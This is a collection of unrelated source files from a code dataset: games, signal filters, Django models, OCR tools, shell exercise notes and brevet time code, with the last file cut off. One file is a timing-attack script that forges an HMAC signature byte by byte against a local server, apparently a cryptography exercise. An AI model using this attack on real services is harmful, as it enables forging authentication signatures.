0xff)\r\n for i in self.body:\r\n self.grid.draw(i, self.color)\r\n\r\n #蛇像一个指定点移动\r\n def move(self, new):\r\n self.body.insert(0, new)\r\n pop = self.body.pop()\r\n self.grid.draw(pop, self.grid.bg)\r\n self.grid.draw(new, self.color)\r\n\r\n #蛇像一个指定点移动,并增加长度\r\n def add(self ,new):\r\n self.body.insert(0, new)\r\n self.grid.draw(new, self.color)\r\n\r\n #蛇吃到了特殊食物1,剪短自身的长度\r\n def cut_down(self,new):\r\n self.body.insert(0, new)\r\n self.grid.draw(new, self.color)\r\n for i in range(0,3):\r\n pop = self.body.pop()\r\n self.grid.draw(pop, self.grid.bg)\r\n\r\n #蛇吃到了特殊食物2,回到最初长度\r\n def init(self, new):\r\n self.body.insert(0, new)\r\n self.grid.draw(new, self.color)\r\n while len(self.body) > 3:\r\n pop = self.body.pop()\r\n self.grid.draw(pop, self.grid.bg)\r\n\r\n #蛇吃到了特殊食物3,改变了自身的颜色,纯属好玩\r\n def change(self, new, color):\r\n self.color = color\r\n self.body.insert(0, new)\r\n for item in self.body:\r\n self.grid.draw(item, self.color)\r\nclass SnakeGame():\r\n def __init__(self):\r\n self.grid = Grid()\r\n self.snake = Snake(self.grid)\r\n self.food = Food(self.grid)\r\n self.gameover = False\r\n self.score = 0\r\n self.status = ['run', 'stop']\r\n self.speed = 300\r\n self.display_food()\r\n #type1:普通食物 type2:减少2 type3:大乐透,回到最初状态 type4:吃了会变色\r\n def display_food(self):\r\n self.food.color = color565(0xff, 0x00, 0x00)\r\n self.food.type = 1\r\n if randint(0, 40) == 5:\r\n self.food.color = color565(0x00, 0xff, 0x00)\r\n self.food.type = 3\r\n while (self.food.pos in self.snake.body):\r\n self.food.set_pos()\r\n self.food.display()\r\n elif randint(0, 4) == 2:\r\n self.food.color = color565(0x00, 0x00, 0xff)\r\n self.food.type = 4\r\n while (self.food.pos in self.snake.body):\r\n self.food.set_pos()\r\n self.food.display()\r\n elif len(self.snake.body) > 10 and randint(0, 16) == 5:\r\n self.food.color = color565(0xff, 0xff, 0xff)\r\n self.food.type = 2\r\n while (self.food.pos in self.snake.body):\r\n self.food.set_pos()\r\n self.food.display()\r\n else:\r\n while (self.food.pos in self.snake.body):\r\n self.food.set_pos()\r\n self.food.display()\r\n print(self.food.type)\r\n\r\n #这个方法用于游戏重新开始时初始化游戏\r\n def initial(self):\r\n self.gameover = False\r\n self.score = 0\r\n #self.m.set(\"Score:\"+str(self.score))\r\n self.snake.initial()\r\n def run(self):\r\n while True:\r\n i=0\r\n j=-1\r\n for k in keys:\r\n if k():\r\n if i!=j:\r\n j=i\r\n self.key_release(i)\r\n i=i+1\r\n if i>3:\r\n i=0\r\n #首先判断游戏是否暂停\r\n if not self.status[0] == 'stop':\r\n if self.gameover == True:\r\n self.initial()\r\n else:\r\n #判断游戏是否结束\r\n self.move()\r\n utime.sleep_ms(125)\r\n #self.after(self.speed, self.run)\r\n def move(self, color=color565(0xff, 0xff, 0xff)):\r\n # 计算蛇下一次移动的点\r\n head = self.snake.body[0]\r\n #print(self.snake.direction)\r\n if self.snake.direction == 'Up':\r\n if head[1] - 1 < 0:\r\n new = (head[0], 29)\r\n else:\r\n new = (head[0], head[1] - 1)\r\n elif self.snake.direction == 'Down':\r\n new = (head[0], (head[1] + 1) % 29)\r\n elif self.snake.direction == 'Left':\r\n if head[0] - 1 < 0:\r\n new = (21, head[1])\r\n else:\r\n new = (head[0] - 1, head[1])\r\n else:\r\n new = ((head[0] + 1) % 21, head[1])\r\n #撞到自己,设置游戏结束的标志位,等待下一循环\r\n if new in self.snake.body:\r\n self.gameover=True\r\n #吃到食物\r\n elif new == self.food.pos:\r\n print(self.food.type)\r\n if self.food.type == 1:\r\n self.snake.add(new)\r\n elif self.food.type == 2:\r\n self.snake.cut_down(new)\r\n elif self.food.type == 4:\r\n self.snake.change(new, color565(0x00, 0x00, 0xff))\r\n else:\r\n self.snake.init(new)\r\n self.display_food()\r\n\r\n #什么都没撞到,继续前进\r\n else:\r\n self.snake.move(new)\r\n def key_release(self, key):\r\n keymatch=[\"Down\",\"Left\",\"Up\",\"Right\"]\r\n key_dict = {\"Up\": \"Down\", \"Down\": \"Up\", \"Left\": \"Right\", \"Right\": \"Left\"}\r\n print(keymatch[key])\r\n #蛇不可以像自己的反方向走\r\n if keymatch[key] in key_dict and not keymatch[key] == key_dict[self.snake.direction]:\r\n self.snake.direction = keymatch[key]\r\n self.move()\r\n\r\nif __name__ == '__main__':\r\n snake = SnakeGame()\r\n snake.run()\r\n\r\n","sub_path":"games/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":7521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"37919600","text":"import numpy as np\nimport pandas as pd\nfrom quickplot import qp\nimport warnings\n\ndef filterSinc(signal,f,type='gauss',d=False,p=False):\n ''' filter Types : no, gauss, first\n - no : Border effects are to be expected, nothing is done to correct the signal\n - gauss : a gaussian falloff is added to each side of the signal\n - first : repeat the first and last value of the signal\n '''\n l = len(signal)\n #print('length : '+str(l))\n x = np.linspace(-l/2,l/2,len(signal)*10)\n s = np.sinc(2*f*x)\n \n #compute Blackman Window\n w=0.42-0.5*np.cos( 2*np.pi*np.linspace(0,l*10-1,l*10)/(l*10-1) ) +\\\n 0.08*np.cos( 4*np.pi*np.linspace(0,l*10-1,l*10)/(l*10-1) )\n \n #plot sinc with blackman\n if p:\n df = pd.DataFrame(s,columns=[\"s\"])\n df['x']=x\n df.plot(x='x',figsize=(20,8))\n \n #plot Blackman window\n if p:\n qp(w,np.linspace(0,l*10-1,l*10)).set(title='blackman window')\n #df = pd.DataFrame(w,columns=[\"s\"])\n #df['x']=np.linspace(0,l*10-1,l*10)\n #df.plot(x='x',figsize=(20,8))\n s=w*s\n s=s/sum(s)\n \n #plot sinc with blackman\n if p:\n df = pd.DataFrame(s,columns=[\"s\"])\n df['x']=x\n df.plot(x='x',figsize=(20,8))\n \n lin = np.linspace(0,l-1,l*10)\n interp = np.interp(lin, np.linspace(0,l-1,l),signal)\n ls = int(np.ceil(len(s)/2))\n \n if type == 'first':\n interp = np.concatenate(([interp[0]] *ls, interp, [interp[-1]] *ls))\n uninterp = np.linspace(ls,ls+l*10-1,l).astype(int)\n elif type == 'gauss':\n interp = np.concatenate(( [interp[-1]*np.exp(-(x-0)**2/(3*len(interp))) for x in np.linspace(-ls,0,ls) ], interp, [interp[-1]*np.exp(-(x-len(interp))**2/(3*len(interp))) for x in np.linspace(len(interp),len(interp)+ls,ls) ] ))\n uninterp = np.linspace(ls,ls+l*10-1,l).astype(int)\n elif type == 'no':\n uninterp = np.linspace(0,l*10-1,l).astype(int) \n else:\n warnings.warn(\"The type of filtering : \"+ str(type) +\" is not handled. Reverting to 'no'.\")\n uninterp = np.linspace(0,l*10-1,l).astype(int) \n #qp(signal2).set(title='Signal[0]--,signal,--signal[-1]')\n #qp(signal3).set(title='Signal[0]--,signal,--signal[-1]')\n #qp(signal).set(title='signal')\n \n #df2 = pd.DataFrame(interp,columns=['interped'])\n #df2['x1']=lin\n \n #axes = df2.plot(x='x1',figsize=(20,8))\n \n #df3 = pd.DataFrame(signal,columns=['notInterped'])\n #df3['x']=np.linspace(0,l-1,l)\n #df3.plot(ax=axes,x='x')\n if d:\n qp(interp).set(title='interpolation ' + str(type))\n convo = np.convolve(interp,s,'same')\n \n \n #print('len sinc : '+str(len(s))+\" len interped: \"+str(len(interp)) + ' len lin:'+str(len(lin))+' len convo:'+str(len(convo)))\n #qp(convo).set(title='convolved result')\n \n return convo[uninterp]\n","sub_path":"notebooks/scripts/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"155985788","text":"# Escribe un programa que lea (entrada por teclado) una frase, y la pase como parámetro a un procedimiento, \r\n# y éste debe mostrar la frase con un carácter en cada línea.\r\n\r\ndef procedimiento (cadena):\r\n\r\n for i in cadena:\r\n\r\n print (i)\r\n\r\nfrase=input(\"ponga una frase:\")\r\n\r\nprocedimiento(frase)","sub_path":"P7/P7-E3.py","file_name":"P7-E3.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"477039221","text":"# -*- coding: UTF-8 -*-\n# author: liuyang\n# date: 2018/5/27\n# time: 下午2:58\n\nfrom __future__ import print_function\n\nfrom word2vec import w2vcluster\nfrom tfidf import tfidfcluster\nfrom sldaModel import sldaModel\nimport collections\nimport os\nimport shutil\n\nclass Util:\n def dataProcess(corpus_path):\n f = open(\"train-data.dat\", 'w')\n # corpus_path = './data/sourceCorpus.txt'\n enum = []\n\n for line in open(corpus_path, 'r', encoding='utf-8').readlines():\n enum.extend(line.strip('\\n').split(' '))\n\n word_ID = {word: i for i, word in enumerate(set(enum))}\n # print(len(word_ID))\n\n for line in open(corpus_path, 'r', encoding='utf-8').readlines():\n word = []\n word = line.strip('\\n').split(' ')\n M = len(set(word))\n f.write(str(M))\n m = collections.Counter(word)\n for i in set(word):\n # print(\" \" + str(word_ID[i]) + \":\" + str(m[i]))\n f.write(\" \" + str(word_ID[i]) + \":\" + str(m[i]))\n # print(\"\\n\")\n f.write(\"\\n\")\n\n def w2v_slda(w2v_model_path, corpus_path, clusterNum, alpha):\n w2vcluster(w2v_model_path, corpus_path, clusterNum)\n sldaModel(alpha, clusterNum)\n shutil.copy(\"train-data.dat\", \"test-data.dat\")\n shutil.copy(\"train-label.dat\", \"test-label.dat\")\n testdata = \"test-data.dat\"\n testlabel = \"test-label.dat\"\n settings = \"./demo/profile/settings.txt\"\n\n testmodel_path = \"./model/final.model\"\n directory = \".//test_out\"\n\n os.system(r'./demo/profile/slda '\n + \"inf\"\n + r' '\n + testdata\n + r' '\n + testlabel\n + r' '\n + settings\n + r' '\n + testmodel_path\n + r' '\n + directory)\n\n\n def tfidf_slda(corpus_path, clusterNum, alpha):\n tfidfcluster(corpus_path)\n sldaModel(alpha, clusterNum)\n shutil.copy(\"train-data.dat\", \"test-data.dat\")\n shutil.copy(\"train-label.dat\", \"test-label.dat\")\n testdata = \"test-data.dat\"\n testlabel = \"test-label.dat\"\n settings = \"./demo/profile/settings.txt\"\n\n testmodel_path = \"./model/final.model\"\n directory = \"./test_out\"\n\n os.system(r'./demo/profile/slda '\n + \"inf\"\n + r' '\n + testdata\n + r' '\n + testlabel\n + r' '\n + settings\n + r' '\n + testmodel_path\n + r' '\n + directory)\n\n\n\n\n\n\n\n\n\n","sub_path":"Chap_2/demo/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"638134784","text":"import math\n\n\nclass Board:\n \"\"\"\n Helper class for representing and manipulating a game board\n \"\"\"\n COLOURS = [\"red\", \"green\", \"blue\"]\n STARTING_HEXES = {\n \"red\": {(-3, 3), (-3, 2), (-3, 1), (-3, 0)},\n \"green\": {(0, -3), (1, -3), (2, -3), (3, -3)},\n \"blue\": {(3, 0), (2, 1), (1, 2), (0, 3)},\n }\n FINISHING_HEXES = {\n \"red\": {(3, -3), (3, -2), (3, -1), (3, 0)},\n \"green\": {(-3, 3), (-2, 3), (-1, 3), (0, 3)},\n \"blue\": {(-3, 0), (-2, -1), (-1, -2), (0, -3)},\n }\n ADJACENT_STEPS = [(-1, +0), (+0, -1), (+1, -1),\n (+1, +0), (+0, +1), (-1, +1)]\n HEXES = {\n (q, r)\n for q in range(-3, +3 + 1)\n for r in range(-3, +3 + 1)\n if -q - r in range(-3, +3 + 1)\n }\n PASS = (\"PASS\", None)\n\n def __init__(self):\n \"\"\"\n Initialise internal board representation\n \"\"\"\n self.board = {qr: \" \" for qr in Board.HEXES}\n for c in Board.COLOURS:\n for qr in Board.STARTING_HEXES[c]:\n self.board[qr] = c\n\n @staticmethod\n def available_actions(board, colour):\n \"\"\"Return available actions for a colour on a board\n\n Modified from the supplied referee code\n\n\n Arguments:\n board {dict} -- dictionary representing board state\n colour {string} -- string representing player\n\n Returns:\n list -- Available actions\n \"\"\"\n available_actions = []\n for qr in Board.HEXES:\n if board[qr] == colour:\n if qr in Board.FINISHING_HEXES[colour]:\n available_actions.append((\"EXIT\", qr))\n q, r = qr\n for dq, dr in Board.ADJACENT_STEPS:\n for i, atype in [(1, \"MOVE\"), (2, \"JUMP\")]:\n tqr = q + dq * i, r + dr * i\n if tqr in Board.HEXES:\n if board[tqr] == \" \":\n available_actions.append((atype, (qr, tqr)))\n break\n if not available_actions:\n available_actions.append(Board.PASS)\n return available_actions\n\n @staticmethod\n def apply_action(score, board, colour, action):\n \"\"\"Applies an action to a board\n\n Modified from the supplied referee code\n\n Arguments:\n score {dict} -- Dictionary of scores\n board {dict} -- Dictionary representing board state\n colour {string} -- Player to apply action to\n action {tuple} -- Action to apply\n Returns:\n string -- Colour of captured piece for reversing action\n \"\"\"\n atype, aargs = action\n captured = None\n if atype == \"MOVE\":\n qr_a, qr_b = aargs\n board[qr_a] = \" \"\n board[qr_b] = colour\n elif atype == \"JUMP\":\n qr_a, qr_b = (q_a, r_a), (q_b, r_b) = aargs\n qr_c = (q_a + q_b) // 2, (r_a + r_b) // 2\n board[qr_a] = \" \"\n board[qr_b] = colour\n captured = board[qr_c]\n board[qr_c] = colour\n elif atype == \"EXIT\":\n qr = aargs\n board[qr] = \" \"\n score[colour] += 1\n else: # atype == \"PASS\":\n pass\n return captured\n\n @staticmethod\n def reverse_action(score, board, colour, action, captured):\n \"\"\"Reverse an action applied to board\n\n Modified from the supplied referee code\n\n Arguments:\n score {dict} -- Dictionary of scores\n board {dict} -- Dictionary representing board state\n colour {string} -- Player to apply action to\n action {tuple} -- Action to apply\n captured {string} -- If action to reverse was a capture, the colour of the captured piece to restore\n \"\"\"\n atype, aargs = action\n if atype == \"MOVE\":\n qr_a, qr_b = aargs\n board[qr_a] = colour\n board[qr_b] = \" \"\n elif atype == \"JUMP\":\n qr_a, qr_b = (q_a, r_a), (q_b, r_b) = aargs\n qr_c = (q_a + q_b) // 2, (r_a + r_b) // 2\n board[qr_a] = colour\n board[qr_b] = \" \"\n board[qr_c] = captured\n elif atype == \"EXIT\":\n qr = aargs\n board[qr] = colour\n score[colour] -= 1\n else: # atype == \"PASS\":\n pass\n\n @staticmethod\n def terminal_test(scores):\n \"\"\"Test if state is terminal\n\n Arguments:\n scores {dict} -- Game score dictionary\n\n Returns:\n bool -- True if game is over\n \"\"\"\n for colour in Board.COLOURS:\n if scores[colour] == 4:\n return True\n return False\n\n @staticmethod\n def exit_dist(qr, colour):\n \"\"\"Distance a given piece is from exiting\n\n Arguments:\n qr {tuple} -- Tuple representing piece\n colour {string} -- Colour of piece\n\n Returns:\n int -- Distance from exit\n \"\"\"\n q, r = qr\n if colour == \"red\":\n return 3 - q\n if colour == \"green\":\n return 3 - r\n if colour == \"blue\":\n return 3 - (-q - r)\n\n @staticmethod\n def evaluate(board, colour, scores):\n \"\"\"State evaluation function\n\n Arguments:\n board {dict} -- Board to evaluate\n colour {string} -- Player persepective to evaluate from\n scores {dict} -- Score of the state to evaluate\n\n Returns:\n float -- Score of the state\n \"\"\"\n self_score = scores[colour]\n self_count = scores[colour]\n others_score = 0\n others_count = 0\n for c in Board.COLOURS:\n if c != colour:\n others_count += scores[c]\n others_score += scores[c]\n\n self_distances = 0\n others_distances = 0\n pieces = set()\n for qr in board:\n if board[qr] != \" \":\n if board[qr] == colour:\n pieces.add(qr)\n self_count += 1\n self_distances += math.sqrt(\n (abs(Board.exit_dist(qr, board[qr]) - 6)))\n else:\n others_distances += math.sqrt(\n (abs(Board.exit_dist(qr, board[qr]) - 6)))\n others_count += 1\n adjacent_bonus = 0\n for q, r in pieces:\n for dq, dr in Board.ADJACENT_STEPS:\n tqr = (q+dq, r+dr)\n if tqr in pieces:\n adjacent_bonus += 1\n score_weight = 100 if (self_count-others_count) <= 0 else 10000\n count_weight = 1000\n distance_weight = 1\n adjacent_weight = 10\n return score_weight * (self_score - others_score) +\\\n count_weight * (self_count - others_count) +\\\n distance_weight * (self_distances - others_distances) +\\\n adjacent_weight * (adjacent_bonus)\n","sub_path":"flying_solo/utils/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":7001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"551617286","text":"from django.db import models\nfrom django.utils.timezone import now\n\n\n# Car Make model\nclass CarMake(models.Model):\n Name = models.CharField(\n null=False,\n max_length=20,\n )\n Description = models.CharField(\n null=False,\n max_length=20,\n )\n Slogan = models.CharField(\n null=False,\n max_length=20,\n )\n\n def __str__(self):\n return \"CarMake: \" + self.Name + \\\n \" - Descritpion: \" + self.Description + \\\n \"\\nSlogan: \" + self.Slogan\n\n\n# Car Model model\nclass CarModel(models.Model):\n NOT_SPEC = ' '\n SEDAN = 'Sedan'\n SUV = 'SUV'\n WAGON = 'WAGON'\n SPORT = 'Sport'\n CAR_TYPES = [\n (NOT_SPEC,'N/A'),\n (SEDAN,'Sedan'),\n (SUV,'SUV'),\n (WAGON,'WAGON'),\n (SPORT,'Sport')\n ]\n CarMake = models.ForeignKey(\n CarMake,\n on_delete=models.CASCADE\n )\n DealerId = models.IntegerField(\n default=-1\n )\n Name = models.CharField(\n null=False,\n max_length=20,\n )\n Type = models.CharField(\n max_length=7,\n choices=CAR_TYPES,\n default=NOT_SPEC\n )\n Year = models.DateField(\n null=False\n )\n\n def __str__(self):\n return \"Car Model: \" + self.Name + \\\n \", Type: \" + self.Type + \\\n \", Year: \" + str(self.Year) + \\\n \", DealerId: \" + str(self.DealerId) + \\\n \", Car Make: <\" + str(self.CarMake) + \" >\"\n\n\n# Car Dealer class\nclass CarDealer:\n def __init__(self, address, city, full_name, id_val, lat, long_val, state, st, zip_val):\n # Dealer address\n self.address = address\n # Dealer city\n self.city = city\n # Dealer Full Name\n self.full_name = full_name\n # Dealer id\n self.id = id_val\n # Location lat\n self.lat = lat\n # Location long\n self.long = long_val\n # Dealer short name\n self.state = state\n # Dealer state\n self.st = st\n # Dealer zip\n self.zip = zip_val\n def __str__(self):\n return \"Dealer name: \" + self.full_name + \\\n \", City: \" + self.city + \\\n \", State: \" + self.state + \\\n \", st: \" + self.st\n\n\n# Dealer Review class\nclass DealerReview:\n def __init__(self, id_review, dealership, name, \\\n purchase, review, purchase_date=None, car_make=None, \\\n car_model=None, car_year=None, sentiment=None):\n # Review id\n self.id = id_review\n # Dealership id\n self.dealership = dealership\n # Reviewer name\n self.name = name\n # Reviewer has purchased\n self.purchase = purchase\n # Reviewer review\n self.review = review\n # Reviewer purchase date\n self.purchase_date = purchase_date\n # Car Make\n self.car_make = car_make\n # Car Model\n self.car_model = car_model\n # Car Year\n self.car_year = car_year\n # Reviewer sentiment\n self.sentiment = sentiment\n def __str__(self):\n return \"Reviewer name: \" + self.name + \\\n \", Dealership: \" + str(self.dealership) + \\\n \", Review: \" + self.review + \\\n \", Purchase: \" + str(self.purchase) + \\\n \", Sentiment: \" + str(self.sentiment) + \\\n \", Car Make: \" + str(self.car_make) + \\\n \", Car Model: \" + str(self.car_model)\n","sub_path":"server/djangoapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"4605219","text":"# Created by lixingxing at 2019/3/7\r\n\r\n\"\"\"\r\nFeature: #Enter feature name here\r\n# Enter feature description here\r\n\r\nScenario: #Enter scenario name here\r\n# Enter steps here\r\n\r\nTest File LocationL: # Enter\r\n\r\n\"\"\"\r\n\r\n\r\nfrom collections import Counter, defaultdict\r\n\r\nfrom image_handlers.ocr_correction.correct_eng_words import correction\r\nimport re\r\nimport os\r\nimport pandas as pd\r\nfrom nltk import ngrams, collocations\r\nfrom tqdm import tqdm\r\n\r\n\r\ndef get_big_en_corpus():\r\n def _text_handler(text):\r\n text = re.sub(r'[\\t\\n]', '', str(text))\r\n text = re.sub(r'[^a-z]', ' ', str(text).lower())\r\n return text\r\n\r\n big_text = pd.read_csv('/Users/lixingxing/IBM/reference/PCB_standard/my_eg_dict/big.txt', sep='\\n',\r\n error_bad_lines=False, header=None, warn_bad_lines=False)\r\n big_text = big_text.values.tolist()\r\n big_text = list(map(_text_handler, big_text))\r\n return big_text\r\n\r\n\r\ndef get_pcb_corpus():\r\n file_folder = '/Users/lixingxing/IBM/reference/PCB_standard/my_cn_dict/txt'\r\n file_contents = []\r\n for f in os.listdir(file_folder):\r\n file_path = os.path.join(file_folder, str(f))\r\n file_content = pd.read_csv(file_path, sep='\\n', encoding='ISO-8859-1', header=None)\r\n file_content_list = file_content.values.tolist()\r\n file_contents.extend(file_content_list)\r\n\r\n new_content = [f[0] for f in file_contents]\r\n pcb_voc_list = list(map(lambda x: re.sub(r'[^a-z]', ' ', str(x).lower()), new_content))\r\n big_text = get_big_en_corpus()\r\n big_text.extend(pcb_voc_list)\r\n return big_text\r\n\r\n\r\ndef sentence_corpus_to_tokens():\r\n mix_big_text = get_pcb_corpus()\r\n tokens = [token for s in mix_big_text for token in s.split(' ') if token != '']\r\n return tokens\r\n\r\n\r\ndef get_score_dicts_from_tokens(tokens):\r\n uni_score_dict = defaultdict(lambda: 0)\r\n uni_gram = list(ngrams(tokens, 1))\r\n uni_score = Counter(uni_gram)\r\n for u_word in uni_score:\r\n uni_score_dict[u_word] = uni_score[u_word]\r\n\r\n bi_score_dict = defaultdict(lambda: 0)\r\n bgm = collocations.BigramAssocMeasures\r\n finder = collocations.BigramCollocationFinder.from_words(tokens)\r\n b_scored = finder.score_ngrams(bgm.likelihood_ratio)\r\n for b_s in b_scored:\r\n bi_score_dict[b_s[0]] = b_s[1]\r\n return uni_score_dict, bi_score_dict\r\n\r\n\r\ndef get_split(elements):\r\n if not elements:\r\n return [[]]\r\n\r\n max_step = 3\r\n\r\n results = []\r\n\r\n for i in range(1, 1 + max_step):\r\n if i <= len(elements):\r\n remain = get_split(elements[i:])\r\n for s in remain:\r\n results.append(elements[:i] + [None] + s)\r\n\r\n return results\r\n\r\n\r\ndef parse_result(r):\r\n string_repr = ''.join([str(e) if e else ' ' for e in r])\r\n return string_repr\r\n\r\n\r\ndef get_candidates_list(token_list):\r\n candidates_list = []\r\n for i, r in enumerate((get_split(token_list))):\r\n candidates_list.append([i for i in parse_result(r).split(' ') if i is not ''])\r\n return candidates_list\r\n\r\n\r\ndef connect_split_word_main(word_need_connect):\r\n def _max_total(_candidates_list):\r\n total_score = 0\r\n uni_candidate, bi_candidate = _candidates_list\r\n uni_candidate = list(uni_candidate)\r\n bi_candidate = list(bi_candidate)\r\n if bi_candidate is not []:\r\n for x in range(len(bi_candidate)):\r\n if uni_score_dict[uni_candidate[x]]:\r\n p_x = uni_score_dict[uni_candidate[x]]\r\n p_xy = bi_score_dict[bi_candidate[x]]\r\n p_y_x = p_xy / p_x\r\n total_score += p_y_x\r\n else:\r\n total_score += 0\r\n else:\r\n total_score += uni_score_dict[uni_candidate[0]]\r\n return total_score\r\n\r\n words = word_need_connect.split(' ')\r\n candidates_list = get_candidates_list(words)\r\n\r\n candidate_group = []\r\n candidate_dict = {}\r\n for candi in tqdm(candidates_list):\r\n candi_condition = []\r\n new_candi = [correction(c.lower()) for c in candi]\r\n candi_bi = list(ngrams(new_candi, 2))\r\n candi_uni = list(ngrams(new_candi, 1))\r\n candi_condition.append(tuple(candi_uni))\r\n candi_condition.append(tuple(candi_bi))\r\n candidate_group.append(candi_condition)\r\n candidate_dict[tuple(candi_condition)] = new_candi\r\n\r\n tokens = sentence_corpus_to_tokens()\r\n uni_score_dict, bi_score_dict = get_score_dicts_from_tokens(tokens)\r\n connected_words = ' '.join(candidate_dict[tuple(max(candidate_group, key=_max_total))])\r\n return connected_words\r\n\r\n\r\nif __name__ == '__main__':\r\n # words_token = 'The Bes ic confiqurat ions of Bo ards'\r\n words_token = 'Layer Conf i quration'\r\n connected = connect_split_word_main(words_token)\r\n print('original token is:{}'.format(words_token))\r\n print('connected token is:{}'.format(connected))\r\n","sub_path":"image_handlers/ocr_correction/connect_split_word.py","file_name":"connect_split_word.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"232571154","text":"import requests\nimport datetime\nimport operator\n\ndef main():\n win = False\n\n brute_force = '0' * 40\n byte_times = {}\n brute_idx = 0\n curr_byte = 0x00\n\n while not win:\n payload = {'file': 'breakme', 'signature': brute_force}\n time_list = []\n\n for i in range(1):\n start = datetime.datetime.now()\n r = requests.get('http://127.0.0.1:8081/crypto', params = payload)\n end = datetime.datetime.now()\n\n if r.status_code == 200:\n win = True\n\n diff = (end - start).total_seconds()\n time_list.append(diff)\n\n byte_times[\"{0:0{1}x}\".format(curr_byte, 2)] = sum(time_list) / len(time_list)\n curr_byte += 1\n\n if curr_byte == 0x100:\n best = max(byte_times, key=byte_times.get)\n byte_times = {}\n s = list(brute_force)\n s[brute_idx] = best\n s[brute_idx + 1] = ''\n brute_force = \"\".join(s)\n brute_idx += 2\n curr_byte = 0\n else:\n s = list(brute_force)\n s[brute_idx] = \"{0:0{1}x}\".format(curr_byte, 2)\n s[brute_idx + 1] = ''\n brute_force = \"\".join(s)\n\n if brute_idx == 40:\n break\n\n print(win)\n\nif __name__ == '__main__':\n main()\n","sub_path":"part 4/31.py","file_name":"31.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"539382226","text":"# 1. 统计系统当前运行的进程数\n# ps aux | grep java | grep -v grep | wc -l\n\n# 2. 编写一个脚本, 输出脚本所在的路径\n# echo $PWD\n\n# 3. 书写一个脚本, 显示系统当前日期和时间\n# echo $(date +%Y-%m-%d_%H:%M:%S)\n\n# 4. 请编写一个脚本将/opt/hatech.log文件备份至/tmp下, 备份的文件名带上当前系统时间\n# cp /opt/hatech.log /tmp/hatech.log-$(date +%Y%m%d%H%M%S)\n\n# 5. 请使用一条指令检索当前服务器上所有的Java进程, 并批量关闭不区分大小写\n# java_pid = $(ps aux | egrep [Jj][aA][vV][aA] | grep -v grep | awk '{ print $2 }')\n# for pid in ${java_pid}; do\n# kill -9 pid\n# done\n\n# 6. 将hatech.txt文件中的tab符,都替换成|\n# sed -ie \"s/\\t/|/g\" hatech.txt\n\n# 7. 批量修改名称, 后缀修改为大写\nimport os\n\nfor files in os.listdir('./'):\n print(\n os.path.join(\n os.path.splitext(files)[0],\n os.path.splitext(files)[1].upper()).replace('/', '')\n )\n\n# 8. 写出你常用的10个python模块, 体现python深度\n# subprocess, psutil, paramiko, echarts, random\n# re, logging, os, \n\n\n","sub_path":"04day/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"597236390","text":"\"\"\"\nOpen and close time calculations\nfor ACP-sanctioned brevets\nfollowing rules described at https://rusa.org/octime_alg.html\nand https://rusa.org/pages/rulesForRiders\n\"\"\"\nimport arrow\n\n# These date below will not change often so we can pre-calculate them.\nspeed_interval = [200, 400, 600, 1000]\n\nspeed_table = {speed_interval[0]: [15, 34],\n speed_interval[1]: [15, 32],\n speed_interval[2]: [15, 30],\n speed_interval[3]: [11.428, 28]}\n\nfinish_time = {200: [5.88, 13.5],\n 300: [9.0, 20.0],\n 400: [12.13, 27.0],\n 600: [18.799, 40.0],\n 1000: [33.08, 75.0]}\n\nexceed_number = 1.1\n\n\n# Note for CIS 322 Fall 2016:\n# You MUST provide the following two functions\n# with these signatures, so that I can write\n# automated tests for grading. You must keep\n# these signatures even if you don't use all the\n# same arguments. Arguments are explained in the\n# javadoc comments.\n\n# Overall closing time limits vary for each brevet according to the distance.\n# These are: (in hours and minutes, HH:MM) 13:30 for 200 KM,\n# 20:00 for 300 KM,\n# 27:00 for 400 KM,\n# 40:00 for 600 KM,\n# 75:00 for 1000 KM.\n# The last control distance should be between the brevet distance and\n# that distance plus 10% and return the value according ot the time limits of distance\n\ndef get_hour_min_day(hour):\n \"\"\"\n Args:\n hour: a float number of hours after computing\n return:\n a set of hours and time\n \"\"\"\n total_minutes = hour * 60\n days = int(hour // 24)\n hours = int((total_minutes // 60) % 24)\n minutes = int(round(total_minutes % 60))\n return days, hours, minutes\n\n\ndef determine_interval(distance):\n \"\"\"\n Args:\n distance: number, the control distance in kilometers\n Returns:\n interval, the index of speed_interval.\n \"\"\"\n index = 0\n for i in range(0, len(speed_interval)):\n if distance > speed_interval[i]:\n index += 1\n return index\n\n\ndef compute_time(distance, interval, speed_type):\n \"\"\"\n Args:\n distance: number, the control distance in kilometers\n interval: number, the interval of distance\n speed_type: boolean, 1 means max speed, and 0 means min speed\n \"\"\"\n time = 0\n while interval >= 0:\n if interval == 0:\n # distance is smaller than or equal to 200\n time += distance / speed_table[speed_interval[0]][speed_type]\n else:\n # distance is greater than 200\n extra_distance = distance - speed_interval[interval-1]\n time += extra_distance / speed_table[speed_interval[interval]][speed_type]\n distance -= extra_distance\n interval -= 1\n return time\n\n\ndef open_time(control_dist_km, brevet_dist_km, brevet_start_time):\n \"\"\"\n Args:\n control_dist_km: number, the control distance in kilometers\n brevet_dist_km: number, the nominal distance of the brevet\n in kilometers, which must be one of 200, 300, 400, 600,\n or 1000 (the only official ACP brevet distances)\n brevet_start_time: An ISO 8601 format date-time string indicating\n the official start time of the brevet\n Returns:\n An ISO 8601 format date string indicating the control open time.\n This will be in the same time zone as the brevet start time.\n \"\"\"\n # invalid 